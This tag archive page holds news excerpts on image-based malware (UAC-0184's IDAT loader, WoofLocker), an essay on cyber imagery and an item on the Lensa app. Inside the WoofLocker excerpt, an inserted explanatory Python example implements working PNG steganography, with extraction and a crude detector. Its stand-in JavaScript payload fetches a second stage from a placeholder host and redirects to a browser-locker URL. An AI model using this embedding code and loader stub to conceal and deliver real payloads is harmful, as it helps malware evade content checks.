Tag Archive for: images

Hacker group hides malware in images to target Ukrainian organizations


A group of attackers targeting Ukraine-affiliated organizations has been delivering malicious payloads hidden within the pixels of image files. The technique, known as steganography, is one of several advanced evasion features of the malware loader known as IDAT that the group uses.

Tracked as UAC-0184 by several security firms, as well as the Computer Emergency Response Team of Ukraine (CERT-UA), the group was seen targeting Ukrainian servicemen via phishing emails masquerading as messages from Ukraine’s 3rd Separate Assault Brigade and the Israeli Defense Forces (IDF). While most of the recipients of these messages were located in Ukraine, security firm Morphisec has confirmed targets outside of the country as well.

“While the adversary strategically targeted Ukraine-based entities, they apparently sought to expand to additional entities affiliated with Ukraine,” researchers said in a new report. “Morphisec findings brought to the forefront a more specific target — Ukraine entities based in Finland.” Morphisec also observed the new steganography approach in delivering malicious payloads after the initial compromise.

Staged malware injection ends with Remcos trojan

The attacks detected by Morphisec delivered a malware loader known as IDAT or HijackLoader that has been used in the past to deliver a variety of trojans and malware programs including Danabot, SystemBC, and RedLine Stealer. In this case, UAC-0184 used it to deploy a commercial remote access trojan (RAT) program called Remcos.

“Distinguished by its modular architecture, IDAT employs unique features like code injection and execution modules, setting it apart from conventional loaders,” the Morphisec researchers said. “It employs sophisticated techniques such as dynamic loading of Windows API functions, HTTP connectivity tests, process blocklists, and syscalls to evade detection. The infection process of IDAT unfolds in multiple stages, each serving distinct functionalities.”

The infection happens in stages, with the first stage making a call to a remote URL to access a .js (JavaScript) file. The code in this file tells the executable where to look for an…


WoofLocker Toolkit Hides Malicious Codes in Images to Run Tech Support Scams


Aug 19, 2023 | THN | Malvertising / Website Security

Cybersecurity researchers have detailed an updated version of an advanced fingerprinting and redirection toolkit called WoofLocker that’s engineered to conduct tech support scams.

The sophisticated traffic redirection scheme was first documented by Malwarebytes in January 2020. It leverages JavaScript embedded in compromised websites to perform anti-bot and web traffic filtering checks before serving the next-stage JavaScript, which redirects users to a browser locker (aka browlock).

This redirection mechanism, in turn, makes use of steganographic tricks to conceal the JavaScript code within a PNG image that’s served only when the validation phase is successful. Should a user be detected as a bot or not interesting traffic, a decoy PNG file without the malicious code is used.
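Both the IDAT/HijackLoader campaign above and WoofLocker hide a next stage inside PNG pixel data. The following is an added example, not code from either campaign or from Morphisec or Malwarebytes, showing the simplest form of the technique: least-significant-bit (LSB) embedding into the channel bytes of an RGB image, the extraction a loader would perform on the client, and a crude defender-side check. Everything in it is constructed: the gradient cover image, the JavaScript stand-in payload and its example.invalid URL, and the 4-byte length header. The real campaigns' encoding schemes are not described on this page, so nothing here should be read as their format.

```python
"""LSB steganography in a PNG: embed a payload, recover it, and a crude detector.

Added example; not code from the IDAT/HijackLoader or WoofLocker campaigns.
Standard library only: the tiny PNG writer/reader handles just what it
produces (8-bit RGB, scanline filter 0). Cover image and payload are constructed.
"""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, body: bytes) -> bytes:
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def write_png(width: int, height: int, rgb: bytes) -> bytes:
    """Wrap raw row-major RGB bytes (3 per pixel) in a minimal valid PNG."""
    if len(rgb) != width * height * 3:
        raise ValueError("rgb length does not match dimensions")
    stride = width * 3
    raw = b"".join(b"\x00" + rgb[r * stride:(r + 1) * stride] for r in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)  # 8-bit, colour type 2 = RGB
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


def read_png(data: bytes):
    """Parse a PNG as produced by write_png; returns (width, height, rgb). Checks every chunk CRC."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos, idat, width, height = 8, b"", 0, 0
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            raise ValueError("CRC mismatch in chunk %r" % ctype)
        if ctype == b"IHDR":
            width, height, depth, colour = struct.unpack(">IIBB", body[:10])
            if (depth, colour) != (8, 2):
                raise ValueError("only 8-bit RGB is handled here")
        elif ctype == b"IDAT":
            idat += body
        elif ctype == b"IEND":
            break
        pos += 12 + length
    raw = zlib.decompress(idat)
    stride = width * 3
    rows = []
    for r in range(height):
        line = raw[r * (stride + 1):(r + 1) * (stride + 1)]
        if line[0] != 0:
            raise ValueError("only filter type 0 is handled here")
        rows.append(line[1:])
    return width, height, b"".join(rows)


def embed_lsb(rgb: bytes, payload: bytes) -> bytes:
    """Hide payload in the LSB of each channel byte, prefixed by a constructed 4-byte length header."""
    msg = struct.pack(">I", len(payload)) + payload
    if len(msg) * 8 > len(rgb):
        raise ValueError("payload too large for this cover image")
    out = bytearray(rgb)
    for i, byte in enumerate(msg):
        for bit in range(8):
            out[i * 8 + bit] = (out[i * 8 + bit] & 0xFE) | ((byte >> (7 - bit)) & 1)
    return bytes(out)


def lsb_plane(rgb: bytes) -> bytes:
    """Pack the LSB of every channel byte into bytes (8 channel bytes -> 1 output byte)."""
    out = bytearray()
    for i in range(0, len(rgb) - len(rgb) % 8, 8):
        byte = 0
        for bit in range(8):
            byte = (byte << 1) | (rgb[i + bit] & 1)
        out.append(byte)
    return bytes(out)


def extract_lsb(rgb: bytes) -> bytes:
    """Inverse of embed_lsb: read the length header, then that many bytes, from the LSB plane."""
    plane = lsb_plane(rgb)
    (length,) = struct.unpack(">I", plane[:4])
    if 4 + length > len(plane):
        raise ValueError("length header exceeds cover capacity: no (or corrupted) payload")
    return plane[4:4 + length]


def lsb_compression_ratio(rgb: bytes) -> float:
    """Crude detector: a structured LSB plane compresses well, a payload-carrying one does not."""
    plane = lsb_plane(rgb)
    return len(zlib.compress(plane, 9)) / len(plane)


# Constructed cover: a 64x64 smooth gradient standing in for a benign-looking decoy image.
W = H = 64
COVER = bytes(c for y in range(H) for x in range(W)
              for c in ((x * 255) // (W - 1), (y * 255) // (H - 1), 0x80))
# Constructed stand-in for a hidden next stage (WoofLocker hid JavaScript); the URL is not real.
PAYLOAD = (b"(function(){var s=document.createElement('script');"
           b"s.src='https://example.invalid/stage2.js?t='+Date.now();"
           b"s.onload=function(){window.location='https://example.invalid/browlock/'"
           b"+Math.random().toString(36).slice(2);};document.head.appendChild(s);})();")


def demo():
    """Round-trip the payload through a real PNG file and compare the detector on clean vs stego."""
    clean_png = write_png(W, H, COVER)
    stego_png = write_png(W, H, embed_lsb(COVER, PAYLOAD))
    recovered = extract_lsb(read_png(stego_png)[2])
    return {"recovered_ok": recovered == PAYLOAD,
            "size_delta": len(stego_png) - len(clean_png),
            "clean_ratio": lsb_compression_ratio(read_png(clean_png)[2]),
            "stego_ratio": lsb_compression_ratio(read_png(stego_png)[2])}


if __name__ == "__main__":
    print(demo())
```

The image stays a fully valid PNG (correct CRCs, decodable by any viewer), which is why steganographic delivery passes content-type and image-validity checks. The compression-ratio heuristic only works for smooth or synthetic covers such as the gradient here; the LSB plane of a real photograph is already noisy, so it will produce false negatives there, and encrypting the payload does not change that. In practice the more reliable artefact is the decoding routine in the loader or in the served JavaScript, since whatever is hidden in the pixels must be read back out before it can run.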

WoofLocker is also known as 404Browlock due to the fact that visiting the browlock URL directly without the appropriate redirection or one-time session token results in a 404 error page.

The cybersecurity firm’s latest analysis shows that the campaign is still ongoing.


“The tactics and techniques are very similar, but the infrastructure is now more robust than before to defeat potential takedown attempts,” Jérôme Segura, director of threat intelligence at Malwarebytes, said.

“It is just as difficult to reproduce and study the redirection mechanism now as it was then, especially in light of new fingerprinting checks” to detect the presence of virtual machines, certain browser extensions, and security tools.

A majority of the sites loading WoofLocker are adult websites, with the infrastructure using hosting providers in Bulgaria and Ukraine that give the threat actors stronger protection against takedowns.

The primary goal of browser lockers is to get targeted victims to call for assistance with (non-existent) computer problems, so that the scammers can gain remote control of the computer and present an invoice for a paid “security solution” that supposedly fixes the problem.

“This is handled by third-parties via fraudulent call centers,” Segura noted back in 2020. “The threat actor behind the traffic redirection and browlock will get paid for each successful…


The hooded man at the computer: What are cyber images telling us?


Have you read an article about cyber this year? Perhaps it was about the taking down of Ukrainian government websites at the beginning of Russia’s invasion or the Conti ransomware attack on Costa Rica that led the government to declare a national emergency. Do you remember what image accompanied the article? And more importantly, do you think the image effectively communicated what the article was about?

Back in the mid-2010s, I worked at a think tank that was looking into new ways of warfare, such as the use of drones and cyber attacks. When trying to find images to accompany reports or articles on the topic of cyber, I encountered a problem. Online image searches pulled up image upon image that all looked the same: rows of 1’s and 0’s raining down in green and blue, a padlock, a close-up of a keyboard, or a hooded man in front of a computer. Fast forward to 2022: the ELN’s nuclear and new tech project is exploring the impact of new technologies on nuclear decision-making, and the same problem persists. While the importance of new technologies for conflict and international security has only grown in the past decade, the images used to represent them have remained static, and this hampers our ability to understand these issues and imagine the effects they may have on our future.


Esther Kersley

One new technology that is having a significant impact on international relations, and has received growing attention in the media, is cyber. From the 2007 ‘Nashi’ attack on the Estonian government and the 2010 ‘Stuxnet’ attack targeting Iran’s nuclear program, to Edward Snowden’s NSA data heist in 2013 and Russia’s attack on the 2016 US presidential election, cyberspace has been described as “a global battlefield of the 21st century”. For the past few years, it has been high up on the US’s official list of national security threats, and tops the list of most European states, including the UK.

Despite its growing importance, cyber (like other new technologies) is complex and intangible and remains poorly…


AI images take social media by storm, there may be more to it than meets the eye


BLOOMINGTON — Leito Navarrete has spent his whole life sharpening his craft.

“Fragmentation, collage, composition. I take a lot of inspiration from street art and graffiti,” Navarrete said.

But the Indiana University graduate student is concerned about the future of his industry.

“Almost every other image, or at least one in five images, scrolling down on Instagram is a Lensa portrait,” Navarrete said.

As of Thursday, Lensa AI was the most popular app in the U.S. on Apple’s App Store.

The app, produced by Prisma Labs, Inc., uses an open-source neural network model called Stable Diffusion to create computer-generated images.

Some like Navarrete argue that model takes artists’ material without their consent in the process.

“The most problematic part about this technology, aside from copyright and theft, is making a profit off of this kind of software,” he said.

The app asks you to upload 10 to 20 selfies and then pay a fee of $7.99 to $15.99, depending on the number of variations and styles you’d like.

When it’s done, you’re left with dozens, even hundreds of “magic avatars”.

Andrew Couts, senior editor of security at Wired, says the app may pose cyber security risks.

“The main thing I would be concerned about is the behavioral analytics that they’re collecting. If I were going to use the app, I would make sure to turn on as restrictive privacy settings as possible,” Couts said.

According to the app, photos are immediately deleted from its servers after the Avatars are ready.

Regardless, Couts says to be cautious.

“You can change your privacy settings on your phone to make sure that the app isn’t collecting as much data as it seems to be able to. And you can make sure that you’re not sharing images that contain anything more private than just your face,” Couts said.

As for Navarrete, he hopes consumers will support local artists as much as these apps.

“I think it will become more challenging, even more so than it already is, to make a living as a painter and as an artist. To justify your field of work, expertise and what you can bring to the table,” Navarrete said.

WRTV emailed Prisma Labs and a spokesperson directed us to a FAQ with detailed information on the app.

On…
